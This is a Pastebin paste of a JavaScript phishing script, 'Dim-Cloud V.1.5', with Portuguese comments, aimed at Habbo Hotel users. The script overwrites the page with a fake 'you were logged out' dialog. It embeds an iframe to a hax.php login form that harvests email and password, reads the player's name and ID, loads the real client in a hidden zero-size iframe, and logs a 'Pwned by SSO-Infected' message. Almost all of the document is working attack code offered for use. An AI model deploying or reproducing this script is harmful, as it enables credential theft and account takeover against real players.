Advertisement
Le-Ownect

Dim Cloud JS

Aug 6th, 2014
424
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!-- Name : Dim-Cloud V.1.5 | Date : 21/10/2013 | Made by : Ownect (C) - Function : Form/Email/Senha = Shot Login by Dialog CSS -->
  2. /*
  3. Dim-Cloud V.1.5 2013 (C)                  **********  *             *  ***    ***  ******    ********   ***********    |  '  | - Fim
  4. Criado/Programado por ownect!             *        *   *     *     *   *  *   *    *         *               *         |  '  | - Fim
  5. Design Credit's --------------->          *        *   *           *   *   *  *    ******    *               *         |  '  | - Fim
  6. [B][Y] : [O][W][N][E][C][T] : !           *        *    *   *  *  *    *   *  *    *         *               *         |  '  | - Fim
  7. Design Credit's --------------->          **********      *     *      *    * *    ******    ********        *         |  '  | - Fim
  8. */                                                  
  9. function cloud() { //Start Function cloud :
  10. alert("Volte em breve " + habboName + " - ID : " + habboId + " ");
  11. /* Defini? / Declara? de var's - Config element HTML/CSS */
  12. var msg = '<style type="text/css">#dialog{padding:15px; width:380px; border-radius:4px; border:solid 2px #000; background:#696969; color:#FFF; font: 12px verdana;}</style>';
  13. var tag = '<center>';
  14. var lock = '</center>';
  15. /* Model Engenharia HTML - Form + Iframe */
  16. var cod = ' </Br></Br></Br> ' + tag + ' ' + msg + ' <div id="dialog"><font color="#FFF"><h3>Você foi deslogado <font color="#BDB76B">' + habboName + '</font> ID : ' + habboId + '</h3></font> <hr align="center" width="300" size="1" color=#000>  O habbo abortou sua conexã por alguns segundos, para retornar ao hotel basta fazer seu login! <iframe src="http://localhost/Dim-Cloud%20V.1.5/hax.php" width="190" height="235" frameborder="0"></Br></div> ' + lock + ' ';
  17. /* Inje? de cod HTML */
  18. document.body.innerHTML = '' + cod + '';
  19. /* Element body Iframe ("IFRAME") */
  20. iframe = document.createElement("IFRAME");
  21. iframe.style.width = 0+"px";
  22. iframe.style.height = 0+"px";
  23. /* Iframe http://habbo.com.br/client */
  24. iframe.setAttribute("src", "http://www.habbo.com.br/client");
  25. document.body.appendChild(iframe);
  26. /* Finish CreatElement ("IFRAME"); */
  27. }
  28. /* BOT-Credit's developed script cod */
  29. console.log("Script executado... Dim-Cloud V.1.5 2013 - (C)");
  30. /* JavaScript : SSO-Infected : Method : SSO-Ticket */
  31. javascript:console.log("" + habboName + " Pwned by SSO-Infected - Auto.exe");
  32. /* Call Function */
  33. cloud();
  34. // Finish cod [ X ] :(
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement